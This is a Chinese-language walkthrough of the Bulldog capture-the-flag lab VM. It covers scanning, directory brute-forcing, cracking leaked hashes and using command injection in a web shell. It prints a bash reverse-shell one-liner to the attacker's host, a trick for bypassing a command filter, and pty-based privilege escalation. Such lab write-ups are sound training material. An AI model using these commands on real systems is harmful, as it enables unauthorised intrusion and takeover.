kali IP地址为:192.168.86.128
靶机 IP地址为:192.168.86.130
目录
介绍
设计知识点
- 主机扫描
- 端口扫描
- 主机探测
- 目录扫描
- hash密码破解
- 命令注入
- bash反弹
- Python文件提权
一、信息搜集
1.1 主机发现
同网段扫描主机
1.2 端口扫描
扫描端口获取有关开放端口和目标机器上运行的服务的信息,发现开放了 80 、23 、8080端口
二、漏洞挖掘
2.1 主机探测
网站端口尝试登录查看,发现没有可用信息
2.2 目录爆破
尝试在页面上面点击,发现没有可用信息,直接目录爆破
上图可以看出,爆破出一个后台地址,还有一个dev地址,还有一些其他文件rebots.txt,分别访问这俩个地址,并查看其他文件,看看有没有敏感信息
登录之后发现,/admin/login/ 页面是一个Django框架做的登录框,/robots.txt文件没用,/dev内容太多没有用,查看一下源码
翻译一下是网页开发人员测试时留下的有用信息密码的哈希,直接解密密码2,这几组邮箱密码一个个解密,只有最后俩个可以解密出来
nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com bulldoglover
三、漏洞利用
3.1 命令注入
上面刚刚破解出来的密码,直接登录后台地址
登录后台之后发现没有什么权限,不能操作什么,白弄了半天,这个时候再去访问/dev文件发现shell文件就可以访问了
3.2 bash反弹
这个页面有点熟悉,老套路,设想一下是否存在命令执行漏洞呢,应该可以借助bash实现反弹shell,尝试一下
果然存在命令执行漏洞,直接反弹shell
echo "bash -i >& /dev/tcp/192.168.86.128/3335 0>&1" |bash
反弹成功,拿到shell。当前仅仅是普通用户的权限,直接提权
四、权限提升
4.1 查找用户
进入文件cat /etc/passwd 产看一下用户,发现用户bulldogadmin
切换到home目录下cd bulldogadmin进入目录,输入ls -al查看隐藏文件.hiddenadmindirectory,进入并查看,cat查看这两个文件没有什么可用信息
查看这些文件发现没有什么,查阅资料发现还可以用strings来查看
这几个字符串可能是密码,把它们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,连在一起可以发现中间刚好有PASSWORD
4.2 python提权
直接切换root用户发现不行,报错说须从一个终端运行,可以用Python 调用本地的 shell 实现
python -c 'import pty; pty.spawn("/bin/bash")'
直接 su - 的话,发现报错,报错su: Authentication failure
需要 sudo su
至此,成功拿到最高权限,对方主机已被成功拿下
五、总结
1.利用目录爆破 从爆破出的/dev页面内容中找到一处webshell 页面,查看其源码中查看到认证需要的账号密码。
2.利用webshell页面 可以执行操作系统命令,存在命令注入漏洞,直接bash反弹被禁止 。想办法绕过 echo 先输出命令 | 在输入到 bash中 或者 ls&&id 绕过。
3.获取到shell后 翻文件 看有没有密码等线索。
4.su 命令报错 must be run from a teriminal 必须从一个终端上运行时
python 环境可以
python -c ‘import pty;pty.spawn("/bin/bash")’
将shell转换为终端(tty)模式。
2641
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
